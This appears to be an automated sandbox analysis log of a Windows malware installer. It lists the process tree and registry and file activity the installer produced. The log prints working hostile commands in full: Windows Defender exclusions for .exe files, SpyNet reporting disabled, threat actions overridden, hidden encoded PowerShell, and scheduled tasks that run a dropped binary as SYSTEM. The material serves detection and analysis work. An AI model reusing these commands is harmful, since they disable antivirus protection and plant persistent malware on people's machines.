Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS332F.tmpJump to behavior
Source: classification engineClassification label: mal88.evad.winEXE@90/15@0/0
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exeStatic file information: File size 7604002 > 1048576

Data Obfuscation

barindex
